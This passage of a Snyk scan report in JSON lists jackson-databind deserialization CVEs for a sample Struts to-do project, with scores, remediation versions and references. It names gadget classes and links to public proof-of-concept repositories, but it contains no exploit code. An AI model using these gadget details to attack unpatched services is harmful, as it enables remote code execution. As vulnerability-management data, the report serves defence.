proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + 
"socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1 or higher.\n## References\n- [Blog Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2498)\n", + "epssDetails": { + "percentile": "0.80301", + "probability": "0.00690", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17531" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-gjmw-vf9h-g25v" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-13T07:40:03.046000Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-12T21:52:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-13T07:41:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.918541Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "UltramanGaia" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.2)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2526", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 
"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:49.242419Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.692398Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.922905Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Two additional `net.sf.ehcache` gadgets are not blacklisted.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.2 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2526)\n", + "epssDetails": { + "percentile": "0.79103", + "probability": "0.00622", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-20330" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-01-03T10:26:22.562970Z", + "functions_new": [ + { + "version": [ + "[2.0,2.9.10.2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-01-03T05:14:08Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-01-03T05:14:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.922905Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", 
+ "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2620", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/jas502n/jackson-CVE-2020-8840", + "title": "Jackson PoC" + }, + { + "url": "https://github.com/jas502n/CVE-2020-8840", + "title": "PoC" + }, + { + "url": "https://github.com/Veraxy01/CVE-2020-8840", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "assigner": "NVD", + "severity": "critical", 
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:13.011056Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:01.209202Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:13.031834Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt lacks `xbean-reflect/JNDI` blocking, as demonstrated by `org.apache.xbean.propertyeditor.JndiConverter`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2620)\n- [Jackson PoC](https://github.com/jas502n/jackson-CVE-2020-8840)\n- [PoC](https://github.com/jas502n/CVE-2020-8840)\n- [PoC](https://github.com/Veraxy01/CVE-2020-8840)\n", + "epssDetails": { + "percentile": "0.91001", + "probability": "0.03042", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-8840" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-02-11T07:57:04.144993Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-02-09T21:12:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + 
